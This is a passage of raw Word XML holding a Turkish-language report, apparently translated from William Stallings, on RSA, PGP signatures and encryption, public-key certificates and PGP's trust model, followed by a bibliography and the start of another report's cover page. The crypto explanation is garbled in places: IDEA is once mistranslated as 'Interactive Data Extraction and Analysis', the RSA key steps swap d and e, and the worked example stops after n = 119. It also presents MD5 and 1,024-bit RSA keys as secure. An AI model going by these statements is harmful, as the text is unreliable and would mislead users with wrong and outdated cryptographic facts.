        </w:rPr>
        <w:t xml:space="preserve">mod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>= M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">mod </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t>Hem gönderenin hem de alıcının n değerini bilmesi gerekir. Gönderen e'nin değerini bilir ve yalnızca alıcı d'nin değerini bilir. Dolayısıyla, bu, KU = {e, n} genel anahtarına ve KR = {d, n} özel anahtarına sahip genel anahtar şifreleme algoritmalarıdır. Bu algoritmanın ortak anahtar şifrelemesi için tatmin edici olması için aşağıdaki şartların yerine getirilmesi gerekir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t>Ek 5, RSA algoritmasını özetlemektedir. Algoritmayı anlamak için kullanıcılar, iki asal sayıyı, p ve q seçerek ve şifreleme ve şifre çözme için modül olan n ürünlerini hesaplayarak başlamalıdır. Daha sonra, n'nin Euler totienti olarak adlandırılan, n'den daha az pozitif tamsayıların sayısı olan ve n'nin nispeten asal olan miktarları (n) belirlenmelidir. Daha sonra, f (n) 'nin göreceli olarak asal olan bir tamsayı d (yani, d ve f (n)' nin en büyük ortak böleni 1'dir) seçilmelidir. Son olarak, d, modulo f (n) 'nin çarpımsal tersi olarak hesaplanmalıdır. D ve e'nin istenen özelliklere sahip olduğu gösterilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· İki asal sayı, p = 7 ve q = 17 seçili.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Hesapla n = pq = 7 x 17 = 119.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t>Kodu Kırmak Ne Kadar Zor?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t xml:space="preserve">RSA algoritmasını yenmek için iki olası yaklaşım vardır. Bunlardan ilki, bruteforce yaklaşımı: tüm olası özel anahtarları denemek. Böylece d ve d'deki bit sayısı arttıkça, algoritma daha güvenli olur. Bununla </w:t>
      </w:r>
      <w:r w:rsidRPr="00B32583">
        <w:lastRenderedPageBreak/>
        <w:t>birlikte, hem anahtar üretme hem de şifreleme / şifre çözme işlemlerinde yer alan hesaplamalar karmaşık olduğundan, anahtarın boyutu ne kadar büyükse, sistem o kadar yavaş çalışacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t>RSA'nın kriptanaliziyle ilgili tartışmaların çoğu, iki ana faktör olarak p'yi faktoring görevine odaklanmıştır. Yakın zamana kadar bu, yaklaşık 300 veya daha fazla bit olan 100 ondalık basamak aralığında sayılar için olanaksızdı. Üç geliştiricisi olan Rivest-Shamir-Adleman’ın gücünü göstermek için, 129 ondalık basamaklı bir sayıyı kamu modülü olarak kullanarak şifrelenmiş bir mesajın şifresini çözme mücadelesi verdi. Yazarlar mevcut teknoloji ile kodu kırmanın 40 katrilyon yıl alacağını tahmin ediyorlardı. Son zamanlarda, İnternet üzerinden işbirliği yapan ve yalnızca sekiz aylık çalışmadan sonra 1.600'den fazla bilgisayarı kullanan dünya çapında bir ekip tarafından kod kırıldı. Bu sonuç, RSA kullanımını geçersiz kılmaz; bu sadece daha büyük anahtar boyutlarının kullanılması gerektiği anlamına gelir. Şu anda, 1.024 bitlik bir anahtar boyutu (yaklaşık 300 ondalık basamak), hemen hemen tüm uygulamalar için yeterince güçlü olarak kabul edilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t>PGP Nasıl Çalışır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t>Rivest-Shamir-Adleman, güvenli bir E-posta tesisi için gerekli olan tek şey gibi görünebilir. Pretty Good Privacy kullanmak isteyen herkes eşleşen bir anahtar çifti oluşturabilir (PGP gerekli hesaplamayı yapar) ve sonra genel anahtarı dağıtabilir. Bir mesaj göndermek için, önce gerçekliğini garanti altına almak için önce özel anahtarla şifrelenmiş olması gerekir. Daha sonra, hiç kimsenin mesajı okuyamayacağından emin olmak için birinci adımın sonucunun alıcının genel anahtarı ile şifrelenmesi gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00B32583">
        <w:t>Bu şema teknik olarak geçerlidir ancak pratik değildir. Sorun, RSA'nın ve diğer tüm ortak anahtar programlarının çok yavaş olmasıdır. Keyfi uzunlukta mesajları şifrelemek çift için çok fazla zaman alıyor. Kullanıcılar, PC'lerinin sayıları arttırmalarını beklerken dakika ve hatta saat gecikmeleri yaşayabilirler</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00B32583">
        <w:t>unun yerine, PGP geleneksel ve açık anahtarlı şifrelemenin güçlü yanlarından yararlanır. Bir mesaj gönderildiğinde, güvenlikle ilgili iki işlem aşamasından geçer: dijital imza ve şifreleme.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Dijital imza, açık anahtarlı şifreleme çalışmalarından çıkan en akıllı yeniliklerden biridir. Dijital imza kullanmak için kullanıcılar, 128 bitlik sabit uzunlukta bir kodla göndermek ve eşlemek istedikleri mesajını alır. Bunu yapmak için algoritma denir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>MD5 (mesaj özeti sürüm 5). 128 bitlik mesaj özeti bu mesaj için benzersizdir. Birisinin bu mesajı değiştirmesi ya da başka bir mesajı değiştirmesi ve hala aynı özeti bulması neredeyse imkansız olurdu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00C04894">
        <w:t>PGP daha sonra RSA'yı ve gönderenin özel anahtarını kullanarak özeti şifreler. Sonuç, mesaja eklenen dijital imzadır. Bu mesajı alan herkes mesaj özetini yeniden hesaplayabilir ve RSA'yı ve gönderenin ortak anahtarını kullanarak imzanın şifresini çözebilir. İmzadaki mesaj özeti, hesaplanan mesaj özeti ile eşleşiyorsa, imza geçerlidir. Bu işlem yalnızca 128 bit bloğun şifrelenmesini ve şifresini çözmeyi gerektirdiğinden, çok az zaman alır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Şifreleme aşaması için, PGP rastgele 128-bit bir gizli anahtar oluşturur ve mesajı ve ekli imzayı şifrelemek için Etkileşimli Veri Çıkarma ve Analiz'i kullanır. Alıcı, RSA'yı kullanarak gizli anahtarı bulabilir. PGP, alıcının genel anahtarını kullanarak gizli anahtarı RSA'ya girdi olarak alır ve mesaja eklenmiş şifreli bir gizli anahtar üretir. Alıcı tarafta, PGP gizli anahtarı kurtarmak için alıcının özel anahtarını kullanır ve ardından düz metin mesajı artı imzasını kurtarmak için gizli anahtarı ve IDEA'yı kullanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:lastRenderedPageBreak/>
        <w:t>Genel Anahtarları Alma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Genel anahtar şifreleme teknikleri, her kullanıcı için iki anahtar kullanır: yalnızca bir kullanıcı tarafından bilinen özel bir anahtar ve tüm kullanıcılar tarafından bilinen bir ortak anahtar. Bu iki anahtarla, orijinalliği garanti eden dijital imzalar oluşturmak mümkündür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bir mesajın ve bir mesajın yalnızca amaçlanan alıcının okuyabileceği şekilde şifrelenmesini desteklemek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>Bununla birlikte, her kullanıcının sadece özel anahtarını gizli tuttuğu ve ilgili ortak anahtarı yayınladığı konusunda yaygın bir yanılgı vardır. Ne yazık ki, bu basit bir çözüm değil. Bir sahtekâr, bir kamu ve özel anahtar çifti oluşturabilir ve genel anahtarı başka birinin sanki yayabilir. Örneğin, A kullanıcısının B kullanıcısına güvenli bir mesaj göndermek istediğini varsayalım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Bu sorunun üstesinden gelmenin bir yolu, kamu anahtarlarının güvenli bir şekilde değiştirilmesinde ısrar etmektir. Örneğin, B kullanıcısı ve A kullanıcısı birbirlerini kişisel olarak tanıyorlarsa ve yan yana yaşıyorlarsa, disketlerdeki anahtarları fiziksel olarak değiştirebilirler. Ancak PGP'nin genel amaçlı bir E-posta güvenlik aracı olarak yararlı olması için, yaygın olarak dağıtılmış sitelerdeki kişilerin, daha önce tanışmadıkları ve hatta tanımadıkları başkalarıyla anahtar alışverişinde bulunmaları mümkün olmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Açık Anahtar Sertifikaları ve Dağıtılmış Güvenlik</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>PGP'nin yaygın şekilde kullanılmasına izin veren temel araç ortak anahtar sertifikasıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>ortak anahtar sertifikasının temel unsurları şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Anahtar sahibinin adı ve e-posta adresini içeren bir kullanıcı kimliği.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>· Genel anahtar ve kullanıcı kimliği için bir veya daha fazla dijital imza.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Bilgi İşlem Güveni</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Oldukça İyi Gizlilik, sertifikalandırma makamlarını oluşturmak veya güven oluşturmak için herhangi bir şartname içermemesine rağmen, güven kullanmanın, güven ile ortak anahtarların ilişkilendirilmesinin ve güven bilgilerinin kullanılması için uygun bir yol sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Her kullanıcı bir dizi imzalı anahtar toplayabilir ve ortak anahtar halkası olarak bilinen bir PGP dosyasında saklayabilir. Her girişle ilişkilendirilmiş, PGP'nin bu kullanıcı için geçerli bir ortak anahtar olduğuna ne kadar güveneceğini belirten anahtar bir meşruiyet alanıdır; güven seviyesi ne kadar yüksek olursa, bu kullanıcı kimliğinin bu anahtara bağlanması o kadar güçlü olur. Bu alan Pretty Good Privacy tarafından hesaplanmıştır. Ayrıca girişle ilişkilendirilmiş, anahtarlık sahibinin bu sertifikayı imzalayan topladığı top sıfır veya daha fazla imza. Sırasıyla, her imza onunla, bu PGP kullanıcısının imzalayanları ortak anahtarların sertifikalandırılması için ne kadar güvendiğini belirten bir imza güven alanıyla ilişkilendirmiştir. Kilit meşruiyet alanı, girişteki imza güven alanlarının toplanmasından türetilir. Son olarak, her giriş belirli bir sahiple ilişkilendirilmiş bir ortak anahtar tanımlar ve bu ortak anahtarın diğer ortak anahtar sertifikalarını imzalamak için ne kadar güvenileceğini belirten bir sahip güven alanı bulunur; Bu güven seviyesi kullanıcı tarafından belirlenir. İmza güven alanları, başka bir girişten sahip güven alanının önbellek kopyaları olarak düşünülebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Güven İşleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t xml:space="preserve">A kullanıcısı, ortak anahtar halkasına yeni bir ortak anahtar eklerse, PGP'nin bu ortak anahtarın sahibi ile ilişkilendirilmiş olan güven bayrağına bir değer ataması gerekir. Sahibi aslında A ise ve bu ortak </w:t>
      </w:r>
      <w:r w:rsidRPr="00844C1E">
        <w:lastRenderedPageBreak/>
        <w:t>anahtar ayrıca özel anahtarlıkta da görünürse, o zaman nihai güven değeri otomatik olarak güven alanına atanır. Aksi takdirde, PGP A kullanıcısından bu anahtarın sahibine verilecek güveni değerlendirmesini ister ve A kullanıcısı istenen seviyeye girmelidir. Kullanıcı bu sahibin bilinmeyen, güvenilmeyen, marjinal olarak güvenilir veya tamamen güvenilir olduğunu belirtebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Yeni ortak anahtar girildiğinde, ona bir veya daha fazla imza eklenebilir. Daha sonra daha fazla imza eklenebilir. Girdiye bir imza eklendiğinde, PGP bu imzanın sahibinin bilinen ortak anahtar sahipleri arasında olup olmadığını görmek için ortak anahtarlıkta arama yapar. Öyleyse, bu sahibin OWNERTRUST değeri, bu imza için SIGTRUST alanına atanır. Aksi takdirde, bilinmeyen bir kullanıcı değeri atanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>PGP Güven Modeli Örneği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>“Siz” etiketli düğüm, bu kullanıcıya karşılık gelen halka açık anahtarlıktaki girişi ifade eder. Bu anahtar geçerlidir ve OWNERTRUST değeri nihai güvendir. Anahtar halkasındaki her diğer düğüm, kullanıcı tarafından başka bir değer atanmamışsa, tanımlanmamış bir OWNERTRUST değerine sahiptir. Bu örnekte, kullanıcı, diğer anahtarları imzalamak için her zaman D, E, F ve L kullanıcılarına güvendiğini belirtti. Bu kullanıcı ayrıca, diğer anahtarları imzalamaları için A ve B kullanıcılarına kısmen güveniyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Ek 7'deki düğümlerin gölgelendirilmesi veya olmaması, bu kullanıcı tarafından verilen güven seviyesini gösterir. Ağaç yapısı, hangi anahtarların başka hangi kullanıcılar tarafından imzalandığını gösterir. Bir anahtar aynı zamanda bu anahtarlığa sahip olan bir kullanıcı tarafından imzalanırsa, ok, imzalayan anahtarı imzalayana bağlar. Anahtar, bu anahtarlıkta bulunmayan bir kullanıcı tarafından imzalanırsa, ok, imzalayan anahtarı kullanıcı için bilinmediğini belirten bir soru işaretine bağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>Sonuç</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r w:rsidRPr="00844C1E">
        <w:t>PGP zaten yaygın olarak kullanılıyor. Oldukça İyi Gizlilik, eski Komünist ülkelerde özgürlük için mücadele edenler için önemli hale geldi. Dünyadaki sıradan insanlar alt güvenlikten aktif katılımcılardır. PGP USENET haber grubu. PGP yaygın bir ihtiyacı doldurduğu ve makul bir alternatif olmadığı için geleceği güvende. PGP elde etmek için en iyi konum listelerinden biri, getpgp.asc dosya adıyla, Internet'teki iki Dosya Aktarım Protokolü sitesinde bulunur: ftp.csn.net/mpj ve ftp.netcom.com/pub/mp/mpj .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00B77D82" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B77D82">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kaynakça;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t>William Stallings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:r>
        <w:t xml:space="preserve">William Stallings bağımsız bir danışman ve Comp-Comm Consulting’in Başkanı Brewster MA. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId163" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://www.muhendisbeyinler.net/kriptoloji-ve-sezar-sifreleme-algoritmasi/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId164" w:anchor="imgrc=yqb_UT-2uEazBM:" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://www.google.com/search?q=sezar+algoritmas%C4%B1+%C3%B6rne%C4%9Fi&amp;source=lnms&amp;tbm=isch&amp;sa=X&amp;ved=0ahUKEwiW__LK-a_iAhUC_aQKHedpDJoQ_AUIDigB&amp;biw=1366&amp;bih=657#imgrc=yqb_UT-2uEazBM:</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId165" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://bilgisayarkavramlari.sadievrenseker.com/2009/06/11/idea-uluslar-arasi-sifreleme-algoritmasi/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId166" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://bilgisayarkavramlari.sadievrenseker.com/2008/03/19/rsa/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId167" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://www.sanfoundry.com/cpp-program-implement-rsa-algorithm/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:hyperlink r:id="rId168" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>https://www.google.com/search?biw=1366&amp;bih=608&amp;tbm=isch&amp;sa=1&amp;ei=l8XrXNDVIqHHrgSGsrkQ&amp;q=pgp+&amp;oq=pgp+&amp;gs_l=img.3..35i39l2j0l2j0i30l6.747.747..994...0.0..0.206.206.2-1......0....1..gws-wiz-img.eszA-KbO4sU</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="697F2C87" wp14:editId="4EDC2B7B">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4126" name="Resim 4126"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77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>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77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Prof.Dr. Abdulsamet HAŞILOĞLU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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Section: 2.4.1-2.4.2</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77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Mustafa EDİS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>60757080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B96B8F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Protecting Against Dial-In Hazards: Voice Systems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B96B8F">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
